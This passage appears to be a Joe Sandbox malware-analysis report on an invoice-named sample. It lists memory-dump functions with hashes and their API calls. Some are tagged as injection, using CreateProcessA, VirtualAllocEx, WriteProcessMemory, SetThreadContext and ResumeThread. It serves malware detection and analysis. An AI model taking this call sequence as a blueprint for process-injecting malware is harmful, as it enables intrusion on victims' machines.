Instruction ID: b8d6cb0809de1c11cf170502f0ba31b9d5be4878ad43d60e25e34944fea8cd16
Opcode Fuzzy Hash: 9d78010a3de29622c23dcd6274348f9a9af71232bff27e86e79d7b15a02a5f2c
Instruction Fuzzy Hash: 4932E4B0900259CFEB54DFA9C594A8EFBB2FF48315F55C295C449AB261CB30D986CFA0

Function 02F948C0 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea783918f120858802505e9a1e765228744fdd6993eb7fbde2c98a31a0887a64
Instruction ID: 34a2d0ec937949c1e7885106745f1869ad5166880a26d6563203b35f6b8baad1
Opcode Fuzzy Hash: ea783918f120858802505e9a1e765228744fdd6993eb7fbde2c98a31a0887a64
Instruction Fuzzy Hash: 80E1CC71B016058FEB2ADBB9C850BAEB7F6AFD9344F50446ED2469B390DB30D802CB51

Function 07626078 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2210176128.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7620000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cac07822a9ca517f4823e97d60eb530dad673f6489dff4e2fbad8189fdbdf54
Instruction ID: 5488e797d7bdeaf3d50f31ad989f3eaf86920e6fcecefe4efda4fbd7dffb7abd
Opcode Fuzzy Hash: 4cac07822a9ca517f4823e97d60eb530dad673f6489dff4e2fbad8189fdbdf54
Instruction Fuzzy Hash: 44C17CB1E00629CFDF54CF65C880B9DBBB2AF88300F14C5A9D50AAB355EB309986DF55

Function 07627553 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2210176128.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7620000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 947a7dbc5d1ce0fff2ec78fb869330f2a2cbf8899f1293000b16739f222798a0
Instruction ID: 4ff43d6a7dc6cc31fd94848725086364b4889f83690be199f1d3799cc64a1c2a
Opcode Fuzzy Hash: 947a7dbc5d1ce0fff2ec78fb869330f2a2cbf8899f1293000b16739f222798a0
Instruction Fuzzy Hash: B9C15BB1E00629CFDF54CF65C880B9DBBB2AF88310F14C5A9D50AAB355EB309986DF51

Function 076032AB Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f436015b94e40eaa89929063c0c3a151a7e0a8ae8ae4bb01e214837a945e88a6
Instruction ID: e586d7a5825e35ecca6b7d73c560f6183fef5b23286c1d385a2297a25244cb88
Opcode Fuzzy Hash: f436015b94e40eaa89929063c0c3a151a7e0a8ae8ae4bb01e214837a945e88a6
Instruction Fuzzy Hash: 1561A875E01218CFDB18CFAAD995B9EBBB2FF88305F1481A9D805A7394DB319941CF90

Function 07601FDB Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54a6c3ff2a304880ae91d8322f2233d9484cc0328515728b6e35e0699eb06687
Instruction ID: 64970ab2a2042d6149024591d93c9b41ca966483ddecece08756f9d53dc6acf0
Opcode Fuzzy Hash: 54a6c3ff2a304880ae91d8322f2233d9484cc0328515728b6e35e0699eb06687
Instruction Fuzzy Hash: CF41EAB1E006198FEB58DF6AC85079EFBB2BFC9300F50C0AAD54DA7254EA304A85CF51

Function 0760BA58 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 215aded39edeb89cec462cf08a3c860f707af96021054b4faa4222b666dc2471
Instruction ID: 3e6dc972a6500fc458bd6b2e03bcd7c8ed91a2f3559d3f94e776158cef72751d
Opcode Fuzzy Hash: 215aded39edeb89cec462cf08a3c860f707af96021054b4faa4222b666dc2471
Instruction Fuzzy Hash: FE41D8F0D04219CBDB18CFAAC9447EEBBF6AF89300F14D169D40E66294DB745986CF90

Function 0150D349 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0150D3D6
GetCurrentThread.KERNEL32 ref: 0150D413
GetCurrentProcess.KERNEL32 ref: 0150D450
GetCurrentThreadId.KERNEL32 ref: 0150D4A9

Memory Dump Source

Source File: 00000001.00000002.2206015947.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1500000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3ae0c88a57bcc2d5571b492981d3ab750d8492218d4316176da4dc82501d38b4
Instruction ID: ee597713371e81d5e56991d7c6643bfae8f9c4e4975c941ab19c88bbf162c1fd
Opcode Fuzzy Hash: 3ae0c88a57bcc2d5571b492981d3ab750d8492218d4316176da4dc82501d38b4
Instruction Fuzzy Hash: 2F5147B090034A8FEB44CFA9D548BDEBFF1FF88314F208459E109A7291DBB56944CB65

Function 0150D358 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0150D3D6
GetCurrentThread.KERNEL32 ref: 0150D413
GetCurrentProcess.KERNEL32 ref: 0150D450
GetCurrentThreadId.KERNEL32 ref: 0150D4A9

Memory Dump Source

Source File: 00000001.00000002.2206015947.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1500000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ef86fe361b107e197d78aa144abdf216607c3f97f453e4daa3a351dc58842c25
Instruction ID: 3651ae14c0d36eb52d8dc97fa8ab29e31a228a3ce586442f32e0a6e7ad666367
Opcode Fuzzy Hash: ef86fe361b107e197d78aa144abdf216607c3f97f453e4daa3a351dc58842c25
Instruction Fuzzy Hash: BB5137B090034A8FEB54CFAAD548BDEBBF1FF88314F208459E119A7290DBB56944CB65

Function 02F9159C Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02F917DE

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c0097aa7b1ba24b9db7e26aa35485b3a5627e976275b17c54ab2d9424be8e8d3
Instruction ID: f7a9a28ce1e957e96dc64550dcba943c12b281fb974afc59ae38fe096238be53
Opcode Fuzzy Hash: c0097aa7b1ba24b9db7e26aa35485b3a5627e976275b17c54ab2d9424be8e8d3
Instruction Fuzzy Hash: 01A16D71D0021ADFEF25DFA8C840BDEBBB2BF48354F148169E909A7280DB759985CF91

Function 02F915A8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02F917DE

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1aea73216300c12c56ed014e73109352b8033570e7612cd90c7a77152dec8828
Instruction ID: ba1b8d7f25a98a4374ab4ffe822aa5ec6627de92de88664e06f6e1a6064505ca
Opcode Fuzzy Hash: 1aea73216300c12c56ed014e73109352b8033570e7612cd90c7a77152dec8828
Instruction Fuzzy Hash: 69915C71D0021ADFEF20DFA8C841BDEBBB2BF48354F148569E909A7280DB759985CF91

Function 0150AF8F Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0150B1F6

Memory Dump Source

Source File: 00000001.00000002.2206015947.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1500000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 094f34b763a16ac97b5d13396fdd43ab7a523e33ed48a2ad525284321e639aa1
Instruction ID: 97d61ed34a8369ad39fdf3d52d0ca33b37070f630793a048a76631308c5ba2b5
Opcode Fuzzy Hash: 094f34b763a16ac97b5d13396fdd43ab7a523e33ed48a2ad525284321e639aa1
Instruction Fuzzy Hash: AB817974A00B068FD726CF6AC09475ABBF1FF88300F00892DD49ADBA91D775E845CB91

Function 0150590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015059C9

Memory Dump Source

Source File: 00000001.00000002.2206015947.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1500000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 701a7e56dd60a66350c1a077e9b8bd5c29e95210393ee9018bdea8a079650297
Instruction ID: 37b1e5d6f4e2a03036882793e48edad55283e0937edbf8723edb4d11750a91f8
Opcode Fuzzy Hash: 701a7e56dd60a66350c1a077e9b8bd5c29e95210393ee9018bdea8a079650297
Instruction Fuzzy Hash: 4241E1B1C0071DCBEB25CFA9C9847DEBBB5BF48304F20856AD508AB251DBB5594ACF50

Function 015044F0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015059C9

Memory Dump Source

Source File: 00000001.00000002.2206015947.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1500000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: df5a15aaea23d3a39c0b049bfebb2e3c47418b1aa4541f1ba9825fa718fb481e
Instruction ID: 815b9c7195b86e501b3027934a8e99699cf64f8ecc95eecaea10fb2bd9b462de
Opcode Fuzzy Hash: df5a15aaea23d3a39c0b049bfebb2e3c47418b1aa4541f1ba9825fa718fb481e
Instruction Fuzzy Hash: C9410471C0071DCBEB25CFA9C84478EBBF5BF48304F60856AD508AB251DBB56945CF90

Function 07627E80 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.2210176128.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7620000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 66b96f597312ceb44fcf73b33d50b86d59d1cdb52bb41237156593a983f8d911
Instruction ID: b1bde8c3b861aa897bfbcc0f749b7851f5847b02eb1910c31c62e054071ee437
Opcode Fuzzy Hash: 66b96f597312ceb44fcf73b33d50b86d59d1cdb52bb41237156593a983f8d911
Instruction Fuzzy Hash: C1318BB2904399DFCB11CFA9C844ADEBFF4EF49310F14805AEA54A7261C3359855DFA1

Function 07626020 Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07626EBD,?,?), ref: 07626F6F

Memory Dump Source

Source File: 00000001.00000002.2210176128.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7620000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 00898bc372540ade620398533508fe22053ec91615d8ddf36dab6ebc0a5c7bde
Instruction ID: ffa55a2d5e79489373c4ac6a3c5207ac234b1a9bdb0a3f4e7ef76338119e40c0
Opcode Fuzzy Hash: 00898bc372540ade620398533508fe22053ec91615d8ddf36dab6ebc0a5c7bde
Instruction Fuzzy Hash: 5F31E2B59013199FDB40CFAAD8806DEBFF5BB48320F14842AE919A7710D775A945CFA0

Function 0762602C Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07626EBD,?,?), ref: 07626F6F

Memory Dump Source

Source File: 00000001.00000002.2210176128.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7620000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: a1e625bfddc6e4cc0380fed9eb85e1642d2cc44c83aea8f0f9e6f0f3f4d8aa0b
Instruction ID: c00e71d1ef713f8d13a8d0702e96c694f12473f02788df892f21e098c8a51771
Opcode Fuzzy Hash: a1e625bfddc6e4cc0380fed9eb85e1642d2cc44c83aea8f0f9e6f0f3f4d8aa0b
Instruction Fuzzy Hash: C53102B590021A9FCB50CF9AD884A9EBBF5FB48320F14842AE919A7710D775A905CFA0

Function 02F91319 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02F913B0

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e714d696b83aa161228650c4bd48e12c05458f3b82e02771ef800394dfdf04af
Instruction ID: 900229984145ecb7c74d12325672224b703a3d6e12e7e506e1fbf1173e7e0805
Opcode Fuzzy Hash: e714d696b83aa161228650c4bd48e12c05458f3b82e02771ef800394dfdf04af
Instruction Fuzzy Hash: 632137729003099FDF10CFA9C881BDEBBF5BF48320F10852AE918A7340C7789954CBA1

Function 07626ED3 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07626EBD,?,?), ref: 07626F6F

Memory Dump Source

Source File: 00000001.00000002.2210176128.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7620000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: fbc23c80369b28bd92d7d4d201015acbb27b841e8636b3845d572dda6a0c8f13
Instruction ID: 625136287a729b600307129cb4fe401a218b9566f97ee1e9393bd484000da523
Opcode Fuzzy Hash: fbc23c80369b28bd92d7d4d201015acbb27b841e8636b3845d572dda6a0c8f13
Instruction Fuzzy Hash: 4C21E3B5D0020A9FDB10CF9AD884A9EFBF5FF48320F14842AE919A7710D775A944CFA0

Function 02F91320 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02F913B0

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ab64d58d956d2efac67eae967ee65a11fa057707e2506e3290f1500e2858cab1
Instruction ID: 4a21f0236c15b9fb4e8979d40168c9498d62e24b330cc5a8884f65e2d0807f0e
Opcode Fuzzy Hash: ab64d58d956d2efac67eae967ee65a11fa057707e2506e3290f1500e2858cab1
Instruction Fuzzy Hash: 9821267190034A9FDF10CFAAC885BDEBBF5FF48314F10842AE958A7240D7799954CBA4

Function 02F91409 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F91490

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: dd3c8ea0338168f917bac2de527c6202fe20bb57ccb67174af8cbb21c895fb38
Instruction ID: 48820d2c6ebfb65d32b28717abfa1307edb53333fd75245a7d49d843add27df7
Opcode Fuzzy Hash: dd3c8ea0338168f917bac2de527c6202fe20bb57ccb67174af8cbb21c895fb38
Instruction Fuzzy Hash: 75212572D003499FDB10CFAAC981BEEBBF5BF48320F10842AE519A7240C7799900DBA1

Function 02F90D48 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02F90DCE

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 598417b1f57c3f66f9472e369c8eee193bf384e2efd32038cf8b5a937ff6f23e
Instruction ID: cdf8a4e9681cacea4c39d41f8372176854c54fca294c6b87aea4473526f799e0
Opcode Fuzzy Hash: 598417b1f57c3f66f9472e369c8eee193bf384e2efd32038cf8b5a937ff6f23e
Instruction Fuzzy Hash: A4216A71D003098FDB10CFA9C4857EEBBF4AF88324F14842ED559A7240CB799644CFA5

Function 0150D599 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0150D627

Memory Dump Source

Source File: 00000001.00000002.2206015947.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1500000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7cf7a0748ece4787fc56b54b1960c04960e5176eec00bafd1b98b4b8891ff359
Instruction ID: 653a5ed1aadc5b5f61d8b7c7835c61399c0b5a3549c29735e614ea6d0677d431
Opcode Fuzzy Hash: 7cf7a0748ece4787fc56b54b1960c04960e5176eec00bafd1b98b4b8891ff359
Instruction Fuzzy Hash: 0F2105B5C002489FDB10CF9AD884ADEBFF4FB48310F14801AE918A7350D374A950CF61

Function 02F91410 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F91490

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 09e37915ce7bfd0c0fa437b7af9ce7398258b22623b6f23e4ed18111b5d57a15
Instruction ID: 74eeab425e525213d89a7b88aba4166e97594de9b29c81b3c1ffa53d4392a37b
Opcode Fuzzy Hash: 09e37915ce7bfd0c0fa437b7af9ce7398258b22623b6f23e4ed18111b5d57a15
Instruction Fuzzy Hash: FC210571D003499FDB10DFAAC981BEEBBF5BF48320F10842AE518A7240D7799510DBA5

Function 02F90D50 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02F90DCE

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3f156e359c61846eee97f1068b5b7d458fffa6b34684c4280829e630b340aa7c
Instruction ID: c6a86d952e2c90f066da32ee0a0a4ef60156e8ea4ff96bb314c95ec7d68874ab
Opcode Fuzzy Hash: 3f156e359c61846eee97f1068b5b7d458fffa6b34684c4280829e630b340aa7c
Instruction Fuzzy Hash: DE213871D003098FEB10DFAAC4857AEBBF4AF88324F14842ED559A7240CB79A944CFA5

Function 0150D5A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0150D627

Memory Dump Source

Source File: 00000001.00000002.2206015947.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1500000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 903ed3fad5cf2f381dbe2f9e1c0625602c0eaafedec01b4074ceff96ba0ed54f
Instruction ID: a9b44958084200787c03b4bb9a35c96e646385c5c09ac10c67193fd1b5b1a669
Opcode Fuzzy Hash: 903ed3fad5cf2f381dbe2f9e1c0625602c0eaafedec01b4074ceff96ba0ed54f
Instruction Fuzzy Hash: 2721E3B59002099FDB10CF9AD984ADEBFF8FB48320F14841AE918A7350D375A954CF64

Function 076260CC Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07627E9A,?,?,?,?,?), ref: 07627F3F

Memory Dump Source

Source File: 00000001.00000002.2210176128.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7620000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 33181d61f0ccfd32ae82a01c4531f0df858642910f8d80c1def202c743767ef0
Instruction ID: f8d5e39bec5c51c81541131278a6582c2bdb9876443fe0839dfe826e3f14e4ec
Opcode Fuzzy Hash: 33181d61f0ccfd32ae82a01c4531f0df858642910f8d80c1def202c743767ef0
Instruction Fuzzy Hash: 3E1126B28042599FDB10CFAAC844BDEBFF8EB48320F14841AEA55A7210C375A954DFA4

Function 02F91259 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02F912CE

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d7277f980f2f1e39d43934b5298a44361f4adf6de8125409ba3d8c19ae4448c2
Instruction ID: 07c218359065ce40faf2b3d235ce1bd7aa6fa62c49cc82a960a1f6eb88e7a26c
Opcode Fuzzy Hash: d7277f980f2f1e39d43934b5298a44361f4adf6de8125409ba3d8c19ae4448c2
Instruction Fuzzy Hash: 891189729002499FDF20DFAAC844BDFBBF5AF88320F20841AE519A7210C7759504CFA5

Function 07600890 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 07607000

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 722498630248e135534943e0c9a5e9db70964edc1f0bd2f744dc5ae4f196adb7
Instruction ID: 155c238e902d625544a611567eca98aac944ff8d0c0f1816c2300c2de724a049
Opcode Fuzzy Hash: 722498630248e135534943e0c9a5e9db70964edc1f0bd2f744dc5ae4f196adb7
Instruction Fuzzy Hash: 721130B1C0065A9FCB14CF9AC844B9EFBB4FB48724F10811AE819A3240D7B5AA10CFA4

Function 02F91260 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02F912CE

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8d284e0814f33c14623ce8922325a2d58c957b15321e6b453667710eb8d89ee6
Instruction ID: 850242af723e04da3cc777b806c6c067c0eed5e30e46cafa6211f4542a095674
Opcode Fuzzy Hash: 8d284e0814f33c14623ce8922325a2d58c957b15321e6b453667710eb8d89ee6
Instruction Fuzzy Hash: E11156729002499FDF10DFAAC844BDFBBF5AF88324F10841AE519A7250C775A510CFA4

Function 02F90C98 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(00000086), ref: 02F90D02

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f90000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f35498be8b5fb214a234b27e41fbc7392a7830fd95cc643d299982f12d0c6d26
Instruction ID: 06674109d1a0b526a2f01fdf4048ce0c55ee604ba73e72b9c28517acd596bfb7
Opcode Fuzzy Hash: f35498be8b5fb214a234b27e41fbc7392a7830fd95cc643d299982f12d0c6d26
Instruction Fuzzy Hash: 581149B19002498FDB20DFA9C4457EEBBF5AF88724F24841AD519A7340CB76A540CFA4

Function 07606F8B Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 07607000

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: f8d6cd388f910bc77fbeaa65ecbfcc875240d64de91a3c2f14d06362d9bfdb4e
Instruction ID: a5c5bdfc2fc835c271866eda2a09baeb79ba6828ad33588a884eedf32cae756f
Opcode Fuzzy Hash: f8d6cd388f910bc77fbeaa65ecbfcc875240d64de91a3c2f14d06362d9bfdb4e
Instruction Fuzzy Hash: 2D1112B1C0061A9BCB14CF9AD944B9EFBB4FF48724F14811AE819A3340D775A654CFA1

Function 02F93800 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 02F93865

Memory Dump Source

Source File: 00000001.00000002.2206481793.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

